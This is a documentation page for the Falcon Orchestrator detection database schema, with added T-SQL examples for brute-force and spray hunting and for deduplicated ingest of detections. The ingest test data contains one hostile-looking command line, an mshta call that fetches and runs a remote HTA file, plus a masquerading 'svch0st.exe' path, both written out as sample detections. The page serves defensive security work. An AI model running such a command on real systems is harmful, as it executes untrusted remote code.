Database Schema
This page provides full documentation of the database schema used by the Falcon Orchestrator backend. The database engine is Microsoft SQL Server, tested with SQL Server 2014, though it should be compatible with other versions as well. The version number in each table identifies the first schema version in which the given field appeared.

Stores all detection events received from the Falcon Host Streaming API.
Attribute | Key | Version | Type | Description |
---|---|---|---|---|
DetectionId | PK | 1 | int | Unique identifier in the database for each detection event |
Offset | | 1 | nvarchar(max) | Offset number provided by the API to keep track of the location in the stream. This is used to identify unique detection events from the API stream and ensure no duplicate entries are stored in the database |
Timestamp | | 1 | datetime | Timestamp of when the system saved the detection event to the database |
ProcessStartTime | | 1 | datetime | Provided by the API, timestamp for when the process started |
ProcessEndTime | | 1 | datetime | Provided by the API, timestamp for when the process ended |
ClosedDate | | 1 | datetime | Timestamp of when the detection was set to a closed status |
Name | | 1 | nvarchar(max) | The detection scenario, describing the threat (Known Malware, Drive By Download, etc.) |
Description | | 1 | nvarchar(200) | A full description of the detection scenario identified |
ProcessId | | 1 | nvarchar(100) | Process ID of the offending process |
ParentProcessId | | 1 | nvarchar(100) | Parent process ID of the offending process |
CommandLine | | 1 | nvarchar(max) | Command line and arguments with which the process was executed |
FileName | | 1 | nvarchar(max) | Name of the file executed |
FilePath | | 1 | nvarchar(max) | Path of the file executed |
FalconHostLink | | 1 | nvarchar(500) | Link to the detection event in the Falcon Host UI |
SHA256 | | 1 | nvarchar(64) | SHA256 of the offending file or process |
MD5 | | 1 | nvarchar(32) | MD5 of the offending file or process |
SHA1 | | 1 | nvarchar(40) | SHA1 of the offending file or process |
Comment | | 1 | nvarchar(max) | Analyst-provided commentary to explain resolution or findings |
AccountId | FK | 1 | int | Foreign key to the Accounts table for the associated user account |
DetectionDeviceId | FK | 1 | int | Foreign key to the DetectionDevices table for the associated device |
StatusId | FK | 1 | int | Foreign key to the Status table. Defaults to a status of open and is modified either manually by an analyst or via a whitelisting or taxonomy rule |
VendorSeverityId | | 1 | int | Identifier in the Severities table for the severity provided by CrowdStrike |
CustomSeverityId | FK | 1 | int | Foreign key to the Severities table for the custom severity rating. Defaults to the rating provided by CrowdStrike but can be overridden manually by an analyst or via a taxonomy rule |
CustomerId | FK | 1 | int | Foreign key to the Customers table. Identifies the unique instance of Falcon Host |
ResponderId | FK | 1 | int | Foreign key to the Responders table. Defaults to null unless responders are created and assigned via the scheduling functionality |
Application configuration settings are stored in this table. These are typically account credentials and attributes that enable the integration functionality. Refer to the configuration itemization for the listing of predefined keys. Because credential material is kept in this table, access to it should be limited to the account the application runs under.
Attribute | Key | Version | Type | Description |
---|---|---|---|---|
ConfigId | PK | 1 | int | Unique identifier for each configuration item |
Key | | 1 | nvarchar(max) | The name of the configuration key |
Value | | 1 | nvarchar(max) | Configuration key value |
Stores all authentication audit logs provided by the Falcon Host Streaming API.
Attribute | Key | Version | Type | Description |
---|---|---|---|---|
AuthId | PK | 1 | int | Unique database identifier for each authentication log event |
OperationName | | 1 | nvarchar(50) | The name of the authentication-related operation that was carried out |
ServiceName | | 1 | nvarchar(50) | |
Success | | 1 | bit | Whether the authentication activity was successful or not |
UserId | | 1 | nvarchar(50) | The username of the account associated with the operation |
UserIp | | 1 | nvarchar(45) | The IP address of the user account responsible for the operation |
Timestamp | | 1 | datetime | Timestamp of when the operation occurred |
Offset | | 1 | nvarchar(max) | Provided by the API to keep track of the location in the stream. Uniquely identifies each log event so that no duplicates are stored |
Entitlement | | 1 | nvarchar(100) | The entitlement granted or revoked by the authentication activity |
EntitlementGroup | | 1 | nvarchar(100) | The entitlement group granted or revoked by the authentication activity |
TargetName | | 1 | nvarchar(200) | User account that the operation was applied to |
CustomerId | FK | 1 | int | Foreign key to the Customers table, matched on the CID provided in the API stream. This allows for differentiation of multiple Falcon Host instances |
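The authentication audit columns above (Success, UserId, UserIp, Timestamp) are enough to build simple hunting queries over the log. The following T-SQL is an added example and not part of the Falcon Orchestrator project: the page does not give the table's name, so a temporary table mirroring the documented columns is created, and every row in it is constructed test data (the OperationName and ServiceName values are placeholders, not real API values). The first query finds accounts that failed repeatedly from one address inside a short window and reports whether a success followed the burst; the second finds one address failing against many different accounts, the shape of a password spray.

```sql
-- Added example, not part of the Falcon Orchestrator project.
-- Temp table mirroring the documented authentication log columns.
CREATE TABLE #AuthLogs (
    AuthId           int IDENTITY(1,1) PRIMARY KEY,
    OperationName    nvarchar(50),
    ServiceName      nvarchar(50),
    Success          bit,
    UserId           nvarchar(50),
    UserIp           nvarchar(45),
    [Timestamp]      datetime,
    [Offset]         nvarchar(max),
    Entitlement      nvarchar(100),
    EntitlementGroup nvarchar(100),
    TargetName       nvarchar(200),
    CustomerId       int
);

-- Constructed events for one CID: alice is brute-forced from one address and the
-- attacker eventually gets in; bob has one ordinary failure; one address tries
-- a single guess against several different accounts (a spray).
INSERT INTO #AuthLogs (OperationName, ServiceName, Success, UserId, UserIp, [Timestamp], [Offset], CustomerId)
VALUES
  ('Login', 'Falcon Host', 0, 'alice@example.com', '203.0.113.10', '2016-05-01 09:00:05', '1',  1),
  ('Login', 'Falcon Host', 0, 'alice@example.com', '203.0.113.10', '2016-05-01 09:00:41', '2',  1),
  ('Login', 'Falcon Host', 0, 'alice@example.com', '203.0.113.10', '2016-05-01 09:01:12', '3',  1),
  ('Login', 'Falcon Host', 0, 'alice@example.com', '203.0.113.10', '2016-05-01 09:02:30', '4',  1),
  ('Login', 'Falcon Host', 0, 'alice@example.com', '203.0.113.10', '2016-05-01 09:03:55', '5',  1),
  ('Login', 'Falcon Host', 1, 'alice@example.com', '203.0.113.10', '2016-05-01 09:04:20', '6',  1),
  ('Login', 'Falcon Host', 0, 'bob@example.com',   '198.51.100.7', '2016-05-01 09:10:00', '7',  1),
  ('Login', 'Falcon Host', 1, 'bob@example.com',   '198.51.100.7', '2016-05-01 09:10:30', '8',  1),
  ('Login', 'Falcon Host', 0, 'carol@example.com', '203.0.113.77', '2016-05-01 11:00:00', '9',  1),
  ('Login', 'Falcon Host', 0, 'dave@example.com',  '203.0.113.77', '2016-05-01 11:00:02', '10', 1),
  ('Login', 'Falcon Host', 0, 'erin@example.com',  '203.0.113.77', '2016-05-01 11:00:04', '11', 1);

-- 1) Failure bursts: at least 5 failures for one account from one address within
--    10 minutes, with the first success from that pair after the burst (if any).
;WITH FailureBursts AS (
    SELECT UserId, UserIp,
           COUNT(*)         AS FailureCount,
           MIN([Timestamp]) AS FirstFailure,
           MAX([Timestamp]) AS LastFailure
    FROM #AuthLogs
    WHERE Success = 0
    GROUP BY UserId, UserIp
    HAVING COUNT(*) >= 5
       AND DATEDIFF(MINUTE, MIN([Timestamp]), MAX([Timestamp])) <= 10
)
SELECT b.UserId, b.UserIp, b.FailureCount, b.FirstFailure, b.LastFailure,
       s.FirstSuccessAfterBurst
FROM FailureBursts b
OUTER APPLY (
    SELECT MIN(a.[Timestamp]) AS FirstSuccessAfterBurst
    FROM #AuthLogs a
    WHERE a.Success = 1
      AND a.UserId = b.UserId
      AND a.UserIp = b.UserIp
      AND a.[Timestamp] > b.LastFailure
) s
ORDER BY b.FailureCount DESC;

-- 2) Spray pattern: one source address failing against 3 or more distinct accounts.
SELECT UserIp,
       COUNT(DISTINCT UserId) AS DistinctAccounts,
       COUNT(*)               AS Failures,
       MIN([Timestamp])       AS FirstSeen,
       MAX([Timestamp])       AS LastSeen
FROM #AuthLogs
WHERE Success = 0
GROUP BY UserIp
HAVING COUNT(DISTINCT UserId) >= 3
ORDER BY DistinctAccounts DESC;

DROP TABLE #AuthLogs;
```

The thresholds (5 failures, 10 minutes, 3 accounts) are illustrative and should be tuned to the environment. On the real table, add `CustomerId` to the GROUP BY when more than one Falcon Host instance is stored, so that bursts from different tenants are not merged.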
User account information is stored in this table. An account record is associated with each detection event. The majority of these fields are populated through the Active Directory integration.
Attribute | Key | Version | Type | Description |
---|---|---|---|---|
AccountId | PK | 1 | int | Unique database identifier for each user account |
Timestamp | | 1 | datetime | Timestamp of when the account record was created or last modified |
AccountName | | 1 | nvarchar(50) | The name of the user account, provided by the Falcon Host Streaming API |
FirstName | | 1 | nvarchar(50) | The first name of the user associated with the account |
LastName | | 1 | nvarchar(50) | The last name of the user associated with the account |
Department | | 1 | nvarchar(50) | The department the user belongs to |
JobTitle | | 1 | nvarchar(45) | The job title of the user |
Manager | | 1 | nvarchar(75) | Email address of the user's manager |
EmailAddress | | 1 | nvarchar(75) | Email address of the user associated with the account |
PhoneNumber | | 1 | nvarchar(20) | User's phone number |
Country | | 1 | nvarchar(50) | Country the user is located in |
StateProvince | | 1 | nvarchar(50) | State or province the user is located in |
City | | 1 | nvarchar(50) | City the user is located in |
StreetAddress | | 1 | nvarchar(75) | Street address of the user |
LastLogon | | 1 | datetime | Timestamp of when the user account last logged on |
OrganizationalUnit | | 1 | nvarchar(max) | Active Directory OU the user is stored under |
A junction table used to manage the many-to-many relationship between Account and Ticket entities.

Attribute | Key | Version | Type | Description |
---|---|---|---|---|
AccountTicketId | PK | 1 | int | Unique database identifier for each record |
AccountId | FK | 1 | int | Foreign key to the Accounts table |
TicketId | FK | 1 | int | Foreign key to the Tickets table |
Primarily used to manage multi-tenant environments. Each record in this table represents a unique instance of Falcon Host; the CustomerIdString (or CID for short) is the unique identifier for each instance.

Attribute | Key | Version | Type | Description |
---|---|---|---|---|
CustomerId | PK | 1 | int | Unique database identifier for each record |
CustomerIdString | | 1 | nvarchar(max) | Unique identifier for each Falcon Host instance. This value is provided by the Falcon Streaming API |
Name | | 1 | nvarchar(100) | User-supplied value providing a human-readable name for the instance |
Junction table linking devices and detections. This is needed in order to manage scenarios where there are multiple detections for a given device but the IP address allocated at the time of each detection is different.

Attribute | Key | Version | Type | Description |
---|---|---|---|---|
DetectionDeviceId | PK | 1 | int | Unique database identifier for each record |
IPAddress | | 1 | nvarchar(45) | IP address of the device at the time of the detection. Either manually supplied by a user or dynamically resolved through the DNS Lookup processing rule |
DeviceId | FK | 1 | int | Foreign key to the Devices table |
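Two points from the tables above are worth seeing in code: the Offset-based duplicate check described for the detections table, and the DetectionDevices junction that lets one device carry a different IP address on each detection. The T-SQL below is an added example and not the project's own ingest logic. The page does not name the detections table, so `Detections` is assumed; the temporary tables carry only the columns the example needs, all rows are constructed, and the duplicate check is scoped to the CID on the assumption that offsets are only unique within one instance's stream.

```sql
-- Added example, not the project's own code. Temp tables mirror the documented
-- columns this example uses; every row below is constructed test data.
CREATE TABLE #Customers (
    CustomerId       int IDENTITY(1,1) PRIMARY KEY,
    CustomerIdString nvarchar(max),
    [Name]           nvarchar(100)
);
CREATE TABLE #Accounts (
    AccountId    int IDENTITY(1,1) PRIMARY KEY,
    AccountName  nvarchar(50),
    EmailAddress nvarchar(75)
);
CREATE TABLE #DetectionDevices (
    DetectionDeviceId int IDENTITY(1,1) PRIMARY KEY,
    IPAddress         nvarchar(45),
    DeviceId          int            -- FK to the Devices table in the real schema
);
CREATE TABLE #Detections (               -- 'Detections' is an assumed table name
    DetectionId       int IDENTITY(1,1) PRIMARY KEY,
    [Offset]          nvarchar(max),
    [Timestamp]       datetime DEFAULT GETUTCDATE(),
    [Name]            nvarchar(max),
    CommandLine       nvarchar(max),
    SHA256            nvarchar(64),
    AccountId         int,
    DetectionDeviceId int,
    CustomerId        int
);

INSERT INTO #Customers (CustomerIdString, [Name]) VALUES ('cid-example-0001', 'Example Corp');
INSERT INTO #Accounts (AccountName, EmailAddress) VALUES ('EXAMPLE\jdoe', 'jdoe@example.com');
-- The same device (DeviceId 42) held two different addresses at detection time,
-- so it gets two DetectionDevices rows.
INSERT INTO #DetectionDevices (IPAddress, DeviceId) VALUES ('10.0.1.25', 42), ('10.0.7.130', 42);

DECLARE @CustomerId int = (SELECT CustomerId FROM #Customers WHERE CustomerIdString = 'cid-example-0001');

-- Events arriving from the stream in two batches. Batch 2 replays offset 5001,
-- which must not be stored a second time.
DECLARE @Batch1 TABLE ([Offset] nvarchar(max), [Name] nvarchar(max), CommandLine nvarchar(max), SHA256 nvarchar(64), DetectionDeviceId int);
DECLARE @Batch2 TABLE ([Offset] nvarchar(max), [Name] nvarchar(max), CommandLine nvarchar(max), SHA256 nvarchar(64), DetectionDeviceId int);
INSERT INTO @Batch1 VALUES
  ('5001', 'Known Malware',     'C:\Users\jdoe\Downloads\invoice.exe',                    REPLICATE('a', 64), 1),
  ('5002', 'Drive By Download', 'C:\Windows\System32\mshta.exe http://203.0.113.5/p.hta', REPLICATE('b', 64), 2);
INSERT INTO @Batch2 VALUES
  ('5001', 'Known Malware',     'C:\Users\jdoe\Downloads\invoice.exe',                    REPLICATE('a', 64), 1),
  ('5003', 'Known Malware',     'C:\Users\jdoe\AppData\Local\Temp\svch0st.exe',           REPLICATE('c', 64), 2);

-- Ingest batch 1: store only offsets not already present for this CID.
INSERT INTO #Detections ([Offset], [Name], CommandLine, SHA256, AccountId, DetectionDeviceId, CustomerId)
SELECT e.[Offset], e.[Name], e.CommandLine, e.SHA256, 1, e.DetectionDeviceId, @CustomerId
FROM @Batch1 e
WHERE NOT EXISTS (SELECT 1 FROM #Detections d WHERE d.CustomerId = @CustomerId AND d.[Offset] = e.[Offset]);

-- Ingest batch 2: the replayed offset 5001 is filtered out, 5003 is stored.
INSERT INTO #Detections ([Offset], [Name], CommandLine, SHA256, AccountId, DetectionDeviceId, CustomerId)
SELECT e.[Offset], e.[Name], e.CommandLine, e.SHA256, 1, e.DetectionDeviceId, @CustomerId
FROM @Batch2 e
WHERE NOT EXISTS (SELECT 1 FROM #Detections d WHERE d.CustomerId = @CustomerId AND d.[Offset] = e.[Offset]);

-- Analyst view: tenant, account and the address the device had for each detection.
SELECT d.DetectionId, d.[Offset], c.[Name] AS Customer, a.AccountName,
       dd.DeviceId, dd.IPAddress, d.[Name] AS Scenario, d.CommandLine, d.SHA256
FROM #Detections d
JOIN #Customers        c  ON c.CustomerId = d.CustomerId
JOIN #Accounts         a  ON a.AccountId = d.AccountId
JOIN #DetectionDevices dd ON dd.DetectionDeviceId = d.DetectionDeviceId
ORDER BY d.DetectionId;

DROP TABLE #Detections, #DetectionDevices, #Accounts, #Customers;
```

Two caveats for anyone reusing the duplicate check on the real table. First, the `NOT EXISTS` subquery only sees rows committed before the statement started, so a batch that contains the same offset twice would store both; deduplicate within the batch (for example with `ROW_NUMBER() OVER (PARTITION BY [Offset])`) or insert events one at a time. Second, Offset is declared `nvarchar(max)`, and SQL Server does not allow an `nvarchar(max)` column as an index key, so this existence check scans the customer's detections on every insert; a narrower type, or an indexed persisted computed column derived from it, would make the check cheap.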